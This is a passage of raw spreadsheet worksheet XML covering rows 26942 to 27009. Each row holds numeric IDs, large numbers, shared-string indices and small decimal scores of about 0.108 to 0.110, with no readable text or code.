      <c r="A26942" s="1">
        <v>8944.0</v>
      </c>
      <c r="B26942" s="2">
        <v>5.4905328E7</v>
      </c>
      <c r="C26942" s="2" t="s">
        <v>25898</v>
      </c>
      <c r="D26942" s="2">
        <v>1.0</v>
      </c>
      <c r="E26942" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26942" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="26943" ht="15.75" customHeight="1">
      <c r="A26943" s="1">
        <v>20488.0</v>
      </c>
      <c r="B26943" s="2">
        <v>1.2867376E7</v>
      </c>
      <c r="C26943" s="2" t="s">
        <v>25899</v>
      </c>
      <c r="D26943" s="2">
        <v>1.0</v>
      </c>
      <c r="E26943" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26943" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="26944" ht="15.75" customHeight="1">
      <c r="A26944" s="1">
        <v>22582.0</v>
      </c>
      <c r="B26944" s="2">
        <v>3.8940591E7</v>
      </c>
      <c r="C26944" s="2" t="s">
        <v>25900</v>
      </c>
      <c r="D26944" s="2">
        <v>1.0</v>
      </c>
      <c r="E26944" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26944" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="26945" ht="15.75" customHeight="1">
      <c r="A26945" s="1">
        <v>27717.0</v>
      </c>
      <c r="B26945" s="2">
        <v>2.3061028E7</v>
      </c>
      <c r="C26945" s="2" t="s">
        <v>25347</v>
      </c>
      <c r="D26945" s="2">
        <v>1.0</v>
      </c>
      <c r="E26945" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26945" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="26946" ht="15.75" customHeight="1">
      <c r="A26946" s="1">
        <v>11605.0</v>
      </c>
      <c r="B26946" s="2">
        <v>2.3031224E7</v>
      </c>
      <c r="C26946" s="2" t="s">
        <v>25901</v>
      </c>
      <c r="D26946" s="2">
        <v>1.0</v>
      </c>
      <c r="E26946" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26946" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="26947" ht="15.75" customHeight="1">
      <c r="A26947" s="1">
        <v>31037.0</v>
      </c>
      <c r="B26947" s="2">
        <v>4.7817785E7</v>
      </c>
      <c r="C26947" s="2" t="s">
        <v>25902</v>
      </c>
      <c r="D26947" s="2">
        <v>1.0</v>
      </c>
      <c r="E26947" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26947" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="26948" ht="15.75" customHeight="1">
      <c r="A26948" s="1">
        <v>3763.0</v>
      </c>
      <c r="B26948" s="2">
        <v>3.9803534E7</v>
      </c>
      <c r="C26948" s="2" t="s">
        <v>25903</v>
      </c>
      <c r="D26948" s="2">
        <v>1.0</v>
      </c>
      <c r="E26948" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26948" s="2">
        <v>0.1086601307189543</v>
      </c>
    </row>
    <row r="26949" ht="15.75" customHeight="1">
      <c r="A26949" s="1">
        <v>18381.0</v>
      </c>
      <c r="B26949" s="2">
        <v>5.2583345E7</v>
      </c>
      <c r="C26949" s="2" t="s">
        <v>25904</v>
      </c>
      <c r="D26949" s="2">
        <v>1.0</v>
      </c>
      <c r="E26949" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26949" s="2">
        <v>0.1086235489220564</v>
      </c>
    </row>
    <row r="26950" ht="15.75" customHeight="1">
      <c r="A26950" s="1">
        <v>3762.0</v>
      </c>
      <c r="B26950" s="2">
        <v>3.9803534E7</v>
      </c>
      <c r="C26950" s="2" t="s">
        <v>25905</v>
      </c>
      <c r="D26950" s="2">
        <v>1.0</v>
      </c>
      <c r="E26950" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26950" s="2">
        <v>0.1084229390681004</v>
      </c>
    </row>
    <row r="26951" ht="15.75" customHeight="1">
      <c r="A26951" s="1">
        <v>569.0</v>
      </c>
      <c r="B26951" s="2">
        <v>1.907272E7</v>
      </c>
      <c r="C26951" s="2" t="s">
        <v>25906</v>
      </c>
      <c r="D26951" s="2">
        <v>1.0</v>
      </c>
      <c r="E26951" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26951" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="26952" ht="15.75" customHeight="1">
      <c r="A26952" s="1">
        <v>29216.0</v>
      </c>
      <c r="B26952" s="2">
        <v>3.0798549E7</v>
      </c>
      <c r="C26952" s="2" t="s">
        <v>25907</v>
      </c>
      <c r="D26952" s="2">
        <v>1.0</v>
      </c>
      <c r="E26952" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26952" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="26953" ht="15.75" customHeight="1">
      <c r="A26953" s="1">
        <v>21564.0</v>
      </c>
      <c r="B26953" s="2">
        <v>2.3709252E7</v>
      </c>
      <c r="C26953" s="2" t="s">
        <v>25908</v>
      </c>
      <c r="D26953" s="2">
        <v>1.0</v>
      </c>
      <c r="E26953" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26953" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="26954" ht="15.75" customHeight="1">
      <c r="A26954" s="1">
        <v>20689.0</v>
      </c>
      <c r="B26954" s="2">
        <v>1.4489516E7</v>
      </c>
      <c r="C26954" s="2" t="s">
        <v>25755</v>
      </c>
      <c r="D26954" s="2">
        <v>1.0</v>
      </c>
      <c r="E26954" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26954" s="2">
        <v>0.1082862523540489</v>
      </c>
    </row>
    <row r="26955" ht="15.75" customHeight="1">
      <c r="A26955" s="1">
        <v>1630.0</v>
      </c>
      <c r="B26955" s="2">
        <v>2.7990188E7</v>
      </c>
      <c r="C26955" s="2" t="s">
        <v>25909</v>
      </c>
      <c r="D26955" s="2">
        <v>1.0</v>
      </c>
      <c r="E26955" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26955" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="26956" ht="15.75" customHeight="1">
      <c r="A26956" s="1">
        <v>8283.0</v>
      </c>
      <c r="B26956" s="2">
        <v>5.347833E7</v>
      </c>
      <c r="C26956" s="2" t="s">
        <v>25910</v>
      </c>
      <c r="D26956" s="2">
        <v>1.0</v>
      </c>
      <c r="E26956" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26956" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="26957" ht="15.75" customHeight="1">
      <c r="A26957" s="1">
        <v>11724.0</v>
      </c>
      <c r="B26957" s="2">
        <v>2.3896178E7</v>
      </c>
      <c r="C26957" s="2" t="s">
        <v>25911</v>
      </c>
      <c r="D26957" s="2">
        <v>1.0</v>
      </c>
      <c r="E26957" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26957" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="26958" ht="15.75" customHeight="1">
      <c r="A26958" s="1">
        <v>16315.0</v>
      </c>
      <c r="B26958" s="2">
        <v>4.5969516E7</v>
      </c>
      <c r="C26958" s="2" t="s">
        <v>25912</v>
      </c>
      <c r="D26958" s="2">
        <v>1.0</v>
      </c>
      <c r="E26958" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26958" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="26959" ht="15.75" customHeight="1">
      <c r="A26959" s="1">
        <v>24763.0</v>
      </c>
      <c r="B26959" s="2">
        <v>1.1836647E7</v>
      </c>
      <c r="C26959" s="2" t="s">
        <v>25913</v>
      </c>
      <c r="D26959" s="2">
        <v>1.0</v>
      </c>
      <c r="E26959" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26959" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="26960" ht="15.75" customHeight="1">
      <c r="A26960" s="1">
        <v>27170.0</v>
      </c>
      <c r="B26960" s="2">
        <v>2.0852327E7</v>
      </c>
      <c r="C26960" s="2" t="s">
        <v>25573</v>
      </c>
      <c r="D26960" s="2">
        <v>1.0</v>
      </c>
      <c r="E26960" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26960" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="26961" ht="15.75" customHeight="1">
      <c r="A26961" s="1">
        <v>2907.0</v>
      </c>
      <c r="B26961" s="2">
        <v>3.5812694E7</v>
      </c>
      <c r="C26961" s="2" t="s">
        <v>25914</v>
      </c>
      <c r="D26961" s="2">
        <v>1.0</v>
      </c>
      <c r="E26961" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26961" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26962" ht="15.75" customHeight="1">
      <c r="A26962" s="1">
        <v>3661.0</v>
      </c>
      <c r="B26962" s="2">
        <v>3.9356079E7</v>
      </c>
      <c r="C26962" s="2" t="s">
        <v>25915</v>
      </c>
      <c r="D26962" s="2">
        <v>1.0</v>
      </c>
      <c r="E26962" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26962" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26963" ht="15.75" customHeight="1">
      <c r="A26963" s="1">
        <v>7668.0</v>
      </c>
      <c r="B26963" s="2">
        <v>5.1887534E7</v>
      </c>
      <c r="C26963" s="2" t="s">
        <v>25916</v>
      </c>
      <c r="D26963" s="2">
        <v>1.0</v>
      </c>
      <c r="E26963" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26963" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26964" ht="15.75" customHeight="1">
      <c r="A26964" s="1">
        <v>8724.0</v>
      </c>
      <c r="B26964" s="2">
        <v>5.4506713E7</v>
      </c>
      <c r="C26964" s="2" t="s">
        <v>25917</v>
      </c>
      <c r="D26964" s="2">
        <v>1.0</v>
      </c>
      <c r="E26964" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26964" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26965" ht="15.75" customHeight="1">
      <c r="A26965" s="1">
        <v>9390.0</v>
      </c>
      <c r="B26965" s="2">
        <v>5.5743421E7</v>
      </c>
      <c r="C26965" s="2" t="s">
        <v>25918</v>
      </c>
      <c r="D26965" s="2">
        <v>1.0</v>
      </c>
      <c r="E26965" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26965" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26966" ht="15.75" customHeight="1">
      <c r="A26966" s="1">
        <v>11103.0</v>
      </c>
      <c r="B26966" s="2">
        <v>1.8596063E7</v>
      </c>
      <c r="C26966" s="2" t="s">
        <v>25919</v>
      </c>
      <c r="D26966" s="2">
        <v>1.0</v>
      </c>
      <c r="E26966" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26966" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26967" ht="15.75" customHeight="1">
      <c r="A26967" s="1">
        <v>11121.0</v>
      </c>
      <c r="B26967" s="2">
        <v>1.8934943E7</v>
      </c>
      <c r="C26967" s="2" t="s">
        <v>25920</v>
      </c>
      <c r="D26967" s="2">
        <v>1.0</v>
      </c>
      <c r="E26967" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26967" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26968" ht="15.75" customHeight="1">
      <c r="A26968" s="1">
        <v>12116.0</v>
      </c>
      <c r="B26968" s="2">
        <v>2.6880732E7</v>
      </c>
      <c r="C26968" s="2" t="s">
        <v>25921</v>
      </c>
      <c r="D26968" s="2">
        <v>1.0</v>
      </c>
      <c r="E26968" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26968" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26969" ht="15.75" customHeight="1">
      <c r="A26969" s="1">
        <v>12936.0</v>
      </c>
      <c r="B26969" s="2">
        <v>3.2356888E7</v>
      </c>
      <c r="C26969" s="2" t="s">
        <v>25922</v>
      </c>
      <c r="D26969" s="2">
        <v>1.0</v>
      </c>
      <c r="E26969" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26969" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26970" ht="15.75" customHeight="1">
      <c r="A26970" s="1">
        <v>13581.0</v>
      </c>
      <c r="B26970" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C26970" s="2" t="s">
        <v>25923</v>
      </c>
      <c r="D26970" s="2">
        <v>1.0</v>
      </c>
      <c r="E26970" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26970" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26971" ht="15.75" customHeight="1">
      <c r="A26971" s="1">
        <v>14045.0</v>
      </c>
      <c r="B26971" s="2">
        <v>3.7504815E7</v>
      </c>
      <c r="C26971" s="2" t="s">
        <v>25924</v>
      </c>
      <c r="D26971" s="2">
        <v>1.0</v>
      </c>
      <c r="E26971" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26971" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26972" ht="15.75" customHeight="1">
      <c r="A26972" s="1">
        <v>14938.0</v>
      </c>
      <c r="B26972" s="2">
        <v>4.1253364E7</v>
      </c>
      <c r="C26972" s="2" t="s">
        <v>25925</v>
      </c>
      <c r="D26972" s="2">
        <v>1.0</v>
      </c>
      <c r="E26972" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26972" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26973" ht="15.75" customHeight="1">
      <c r="A26973" s="1">
        <v>15195.0</v>
      </c>
      <c r="B26973" s="2">
        <v>4.2062762E7</v>
      </c>
      <c r="C26973" s="2" t="s">
        <v>25926</v>
      </c>
      <c r="D26973" s="2">
        <v>1.0</v>
      </c>
      <c r="E26973" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26973" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26974" ht="15.75" customHeight="1">
      <c r="A26974" s="1">
        <v>15292.0</v>
      </c>
      <c r="B26974" s="2">
        <v>4.2424764E7</v>
      </c>
      <c r="C26974" s="2" t="s">
        <v>25927</v>
      </c>
      <c r="D26974" s="2">
        <v>1.0</v>
      </c>
      <c r="E26974" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26974" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26975" ht="15.75" customHeight="1">
      <c r="A26975" s="1">
        <v>15386.0</v>
      </c>
      <c r="B26975" s="2">
        <v>4.277957E7</v>
      </c>
      <c r="C26975" s="2" t="s">
        <v>25928</v>
      </c>
      <c r="D26975" s="2">
        <v>1.0</v>
      </c>
      <c r="E26975" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26975" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26976" ht="15.75" customHeight="1">
      <c r="A26976" s="1">
        <v>16024.0</v>
      </c>
      <c r="B26976" s="2">
        <v>4.5076963E7</v>
      </c>
      <c r="C26976" s="2" t="s">
        <v>25929</v>
      </c>
      <c r="D26976" s="2">
        <v>1.0</v>
      </c>
      <c r="E26976" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26976" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26977" ht="15.75" customHeight="1">
      <c r="A26977" s="1">
        <v>18088.0</v>
      </c>
      <c r="B26977" s="2">
        <v>5.1668462E7</v>
      </c>
      <c r="C26977" s="2" t="s">
        <v>25930</v>
      </c>
      <c r="D26977" s="2">
        <v>1.0</v>
      </c>
      <c r="E26977" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26977" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26978" ht="15.75" customHeight="1">
      <c r="A26978" s="1">
        <v>18836.0</v>
      </c>
      <c r="B26978" s="2">
        <v>5.3959977E7</v>
      </c>
      <c r="C26978" s="2" t="s">
        <v>25931</v>
      </c>
      <c r="D26978" s="2">
        <v>1.0</v>
      </c>
      <c r="E26978" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26978" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26979" ht="15.75" customHeight="1">
      <c r="A26979" s="1">
        <v>20014.0</v>
      </c>
      <c r="B26979" s="2">
        <v>5795408.0</v>
      </c>
      <c r="C26979" s="2" t="s">
        <v>25932</v>
      </c>
      <c r="D26979" s="2">
        <v>1.0</v>
      </c>
      <c r="E26979" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26979" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26980" ht="15.75" customHeight="1">
      <c r="A26980" s="1">
        <v>21394.0</v>
      </c>
      <c r="B26980" s="2">
        <v>2.1801268E7</v>
      </c>
      <c r="C26980" s="2" t="s">
        <v>1831</v>
      </c>
      <c r="D26980" s="2">
        <v>1.0</v>
      </c>
      <c r="E26980" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26980" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26981" ht="15.75" customHeight="1">
      <c r="A26981" s="1">
        <v>21829.0</v>
      </c>
      <c r="B26981" s="2">
        <v>2.6989382E7</v>
      </c>
      <c r="C26981" s="2" t="s">
        <v>25933</v>
      </c>
      <c r="D26981" s="2">
        <v>1.0</v>
      </c>
      <c r="E26981" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26981" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26982" ht="15.75" customHeight="1">
      <c r="A26982" s="1">
        <v>22615.0</v>
      </c>
      <c r="B26982" s="2">
        <v>3.9977659E7</v>
      </c>
      <c r="C26982" s="2" t="s">
        <v>25934</v>
      </c>
      <c r="D26982" s="2">
        <v>1.0</v>
      </c>
      <c r="E26982" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26982" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26983" ht="15.75" customHeight="1">
      <c r="A26983" s="1">
        <v>22793.0</v>
      </c>
      <c r="B26983" s="2">
        <v>4550741.0</v>
      </c>
      <c r="C26983" s="2" t="s">
        <v>25935</v>
      </c>
      <c r="D26983" s="2">
        <v>1.0</v>
      </c>
      <c r="E26983" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26983" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26984" ht="15.75" customHeight="1">
      <c r="A26984" s="1">
        <v>22872.0</v>
      </c>
      <c r="B26984" s="2">
        <v>4.7481651E7</v>
      </c>
      <c r="C26984" s="2" t="s">
        <v>25936</v>
      </c>
      <c r="D26984" s="2">
        <v>1.0</v>
      </c>
      <c r="E26984" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26984" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26985" ht="15.75" customHeight="1">
      <c r="A26985" s="1">
        <v>23121.0</v>
      </c>
      <c r="B26985" s="2">
        <v>5128699.0</v>
      </c>
      <c r="C26985" s="2" t="s">
        <v>25937</v>
      </c>
      <c r="D26985" s="2">
        <v>1.0</v>
      </c>
      <c r="E26985" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26985" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26986" ht="15.75" customHeight="1">
      <c r="A26986" s="1">
        <v>23240.0</v>
      </c>
      <c r="B26986" s="2">
        <v>5.3007526E7</v>
      </c>
      <c r="C26986" s="2" t="s">
        <v>25938</v>
      </c>
      <c r="D26986" s="2">
        <v>1.0</v>
      </c>
      <c r="E26986" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26986" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26987" ht="15.75" customHeight="1">
      <c r="A26987" s="1">
        <v>23442.0</v>
      </c>
      <c r="B26987" s="2">
        <v>5.6699145E7</v>
      </c>
      <c r="C26987" s="2" t="s">
        <v>25939</v>
      </c>
      <c r="D26987" s="2">
        <v>1.0</v>
      </c>
      <c r="E26987" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26987" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26988" ht="15.75" customHeight="1">
      <c r="A26988" s="1">
        <v>23562.0</v>
      </c>
      <c r="B26988" s="2">
        <v>6146683.0</v>
      </c>
      <c r="C26988" s="2" t="s">
        <v>25940</v>
      </c>
      <c r="D26988" s="2">
        <v>1.0</v>
      </c>
      <c r="E26988" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26988" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26989" ht="15.75" customHeight="1">
      <c r="A26989" s="1">
        <v>23768.0</v>
      </c>
      <c r="B26989" s="2">
        <v>7541675.0</v>
      </c>
      <c r="C26989" s="2" t="s">
        <v>25941</v>
      </c>
      <c r="D26989" s="2">
        <v>1.0</v>
      </c>
      <c r="E26989" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26989" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26990" ht="15.75" customHeight="1">
      <c r="A26990" s="1">
        <v>23929.0</v>
      </c>
      <c r="B26990" s="2">
        <v>8626255.0</v>
      </c>
      <c r="C26990" s="2" t="s">
        <v>25942</v>
      </c>
      <c r="D26990" s="2">
        <v>1.0</v>
      </c>
      <c r="E26990" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26990" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26991" ht="15.75" customHeight="1">
      <c r="A26991" s="1">
        <v>25422.0</v>
      </c>
      <c r="B26991" s="2">
        <v>1.3797436E7</v>
      </c>
      <c r="C26991" s="2" t="s">
        <v>25943</v>
      </c>
      <c r="D26991" s="2">
        <v>1.0</v>
      </c>
      <c r="E26991" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26991" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26992" ht="15.75" customHeight="1">
      <c r="A26992" s="1">
        <v>25672.0</v>
      </c>
      <c r="B26992" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C26992" s="2" t="s">
        <v>25944</v>
      </c>
      <c r="D26992" s="2">
        <v>1.0</v>
      </c>
      <c r="E26992" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26992" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26993" ht="15.75" customHeight="1">
      <c r="A26993" s="1">
        <v>28267.0</v>
      </c>
      <c r="B26993" s="2">
        <v>2.5369107E7</v>
      </c>
      <c r="C26993" s="2" t="s">
        <v>25945</v>
      </c>
      <c r="D26993" s="2">
        <v>1.0</v>
      </c>
      <c r="E26993" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26993" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26994" ht="15.75" customHeight="1">
      <c r="A26994" s="1">
        <v>28594.0</v>
      </c>
      <c r="B26994" s="2">
        <v>2.6989381E7</v>
      </c>
      <c r="C26994" s="2" t="s">
        <v>25933</v>
      </c>
      <c r="D26994" s="2">
        <v>1.0</v>
      </c>
      <c r="E26994" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26994" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26995" ht="15.75" customHeight="1">
      <c r="A26995" s="1">
        <v>29278.0</v>
      </c>
      <c r="B26995" s="2">
        <v>3.0994721E7</v>
      </c>
      <c r="C26995" s="2" t="s">
        <v>25946</v>
      </c>
      <c r="D26995" s="2">
        <v>1.0</v>
      </c>
      <c r="E26995" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26995" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26996" ht="15.75" customHeight="1">
      <c r="A26996" s="1">
        <v>29574.0</v>
      </c>
      <c r="B26996" s="2">
        <v>3.3384141E7</v>
      </c>
      <c r="C26996" s="2" t="s">
        <v>25947</v>
      </c>
      <c r="D26996" s="2">
        <v>1.0</v>
      </c>
      <c r="E26996" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26996" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26997" ht="15.75" customHeight="1">
      <c r="A26997" s="1">
        <v>29851.0</v>
      </c>
      <c r="B26997" s="2">
        <v>3.5718305E7</v>
      </c>
      <c r="C26997" s="2" t="s">
        <v>25948</v>
      </c>
      <c r="D26997" s="2">
        <v>1.0</v>
      </c>
      <c r="E26997" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26997" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26998" ht="15.75" customHeight="1">
      <c r="A26998" s="1">
        <v>30728.0</v>
      </c>
      <c r="B26998" s="2">
        <v>4.3871512E7</v>
      </c>
      <c r="C26998" s="2" t="s">
        <v>25949</v>
      </c>
      <c r="D26998" s="2">
        <v>1.0</v>
      </c>
      <c r="E26998" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26998" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="26999" ht="15.75" customHeight="1">
      <c r="A26999" s="1">
        <v>30971.0</v>
      </c>
      <c r="B26999" s="2">
        <v>4.748165E7</v>
      </c>
      <c r="C26999" s="2" t="s">
        <v>25936</v>
      </c>
      <c r="D26999" s="2">
        <v>1.0</v>
      </c>
      <c r="E26999" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26999" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="27000" ht="15.75" customHeight="1">
      <c r="A27000" s="1">
        <v>31063.0</v>
      </c>
      <c r="B27000" s="2">
        <v>4.8027899E7</v>
      </c>
      <c r="C27000" s="2" t="s">
        <v>25950</v>
      </c>
      <c r="D27000" s="2">
        <v>1.0</v>
      </c>
      <c r="E27000" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27000" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="27001" ht="15.75" customHeight="1">
      <c r="A27001" s="1">
        <v>31181.0</v>
      </c>
      <c r="B27001" s="2">
        <v>4913043.0</v>
      </c>
      <c r="C27001" s="2" t="s">
        <v>25951</v>
      </c>
      <c r="D27001" s="2">
        <v>1.0</v>
      </c>
      <c r="E27001" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27001" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="27002" ht="15.75" customHeight="1">
      <c r="A27002" s="1">
        <v>31670.0</v>
      </c>
      <c r="B27002" s="2">
        <v>5.1817926E7</v>
      </c>
      <c r="C27002" s="2" t="s">
        <v>25952</v>
      </c>
      <c r="D27002" s="2">
        <v>1.0</v>
      </c>
      <c r="E27002" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27002" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="27003" ht="15.75" customHeight="1">
      <c r="A27003" s="1">
        <v>32795.0</v>
      </c>
      <c r="B27003" s="2">
        <v>6146682.0</v>
      </c>
      <c r="C27003" s="2" t="s">
        <v>25940</v>
      </c>
      <c r="D27003" s="2">
        <v>1.0</v>
      </c>
      <c r="E27003" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27003" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="27004" ht="15.75" customHeight="1">
      <c r="A27004" s="1">
        <v>33348.0</v>
      </c>
      <c r="B27004" s="2">
        <v>7602407.0</v>
      </c>
      <c r="C27004" s="2" t="s">
        <v>25953</v>
      </c>
      <c r="D27004" s="2">
        <v>1.0</v>
      </c>
      <c r="E27004" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27004" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="27005" ht="15.75" customHeight="1">
      <c r="A27005" s="1">
        <v>33783.0</v>
      </c>
      <c r="B27005" s="2">
        <v>8731958.0</v>
      </c>
      <c r="C27005" s="2" t="s">
        <v>25954</v>
      </c>
      <c r="D27005" s="2">
        <v>1.0</v>
      </c>
      <c r="E27005" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27005" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="27006" ht="15.75" customHeight="1">
      <c r="A27006" s="1">
        <v>2044.0</v>
      </c>
      <c r="B27006" s="2">
        <v>3.0898197E7</v>
      </c>
      <c r="C27006" s="2" t="s">
        <v>25955</v>
      </c>
      <c r="D27006" s="2">
        <v>1.0</v>
      </c>
      <c r="E27006" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27006" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27007" ht="15.75" customHeight="1">
      <c r="A27007" s="1">
        <v>3632.0</v>
      </c>
      <c r="B27007" s="2">
        <v>3.9232652E7</v>
      </c>
      <c r="C27007" s="2" t="s">
        <v>25956</v>
      </c>
      <c r="D27007" s="2">
        <v>1.0</v>
      </c>
      <c r="E27007" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27007" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27008" ht="15.75" customHeight="1">
      <c r="A27008" s="1">
        <v>8112.0</v>
      </c>
      <c r="B27008" s="2">
        <v>5.3073417E7</v>
      </c>
      <c r="C27008" s="2" t="s">
        <v>25957</v>
      </c>
      <c r="D27008" s="2">
        <v>1.0</v>
      </c>
      <c r="E27008" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27008" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="27009" ht="15.75" customHeight="1">
      <c r="A27009" s="1">
        <v>12788.0</v>
      </c>
      <c r="B27009" s="2">
        <v>3.1365208E7</v>
      </c>
